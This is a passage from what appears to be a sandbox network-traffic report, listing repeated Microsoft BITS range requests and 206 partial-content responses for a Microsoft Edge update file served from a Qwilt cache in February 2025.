                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c863626-2915334016-22
                Ocn-Served-By: QLT
                Content-Range: bytes 536828-608078/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=608079-727026
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:27 GMT
                Content-Type: application/octet-stream
                Content-Length: 118948
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c865325-2915334016-23
                Ocn-Served-By: QLT
                Content-Range: bytes 608079-727026/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=727027-834710
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:28 GMT
                Content-Type: application/octet-stream
                Content-Length: 107684
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c867063-2915334016-24
                Ocn-Served-By: QLT
                Content-Range: bytes 727027-834710/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=834711-896965
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:29 GMT
                Content-Type: application/octet-stream
                Content-Length: 62255
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c869cfe-2915334016-25
                Ocn-Served-By: QLT
                Content-Range: bytes 834711-896965/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=896966-914155
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:31 GMT
                Content-Type: application/octet-stream
                Content-Length: 17190
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c86cb52-2915334016-26
                Ocn-Served-By: QLT
                Content-Range: bytes 896966-914155/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=914156-1018186
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:32 GMT
                Content-Type: application/octet-stream
                Content-Length: 104031
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c86f631-2915334016-27
                Ocn-Served-By: QLT
                Content-Range: bytes 914156-1018186/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=1018187-1199462
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:33 GMT
                Content-Type: application/octet-stream
                Content-Length: 181276
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c86ffb5-2915334016-28
                Ocn-Served-By: QLT
                Content-Range: bytes 1018187-1199462/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=1199463-1478785
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:35 GMT
                Content-Type: application/octet-stream
                Content-Length: 279323
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c873b24-2915334016-29
                Ocn-Served-By: QLT
                Content-Range: bytes 1199463-1478785/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=1478786-1750644
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:36 GMT
                Content-Type: application/octet-stream
                Content-Length: 271859
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c876994-2915334016-30
                Ocn-Served-By: QLT
                Content-Range: bytes 1478786-1750644/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=1750645-1975044
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:37 GMT
                Content-Type: application/octet-stream
                Content-Length: 224400
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c877743-2915334016-31
                Ocn-Served-By: QLT
                Content-Range: bytes 1750645-1975044/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=1975045-2129203
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:38 GMT
                Content-Type: application/octet-stream
                Content-Length: 154159
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c87a2bb-2915334016-32
                Ocn-Served-By: QLT
                Content-Range: bytes 1975045-2129203/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=2129204-2213309
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:40 GMT
                Content-Type: application/octet-stream
                Content-Length: 84106
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c87d181-2915334016-33
                Ocn-Served-By: QLT
                Content-Range: bytes 2129204-2213309/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=2213310-2315975
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:41 GMT
                Content-Type: application/octet-stream
                Content-Length: 102666
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c87f6fc-2915334016-34
                Ocn-Served-By: QLT
                Content-Range: bytes 2213310-2315975/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=2315976-2466667
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:43 GMT
                Content-Type: application/octet-stream
                Content-Length: 150692
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c883160-2915334016-35
                Ocn-Served-By: QLT
                Content-Range: bytes 2315976-2466667/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
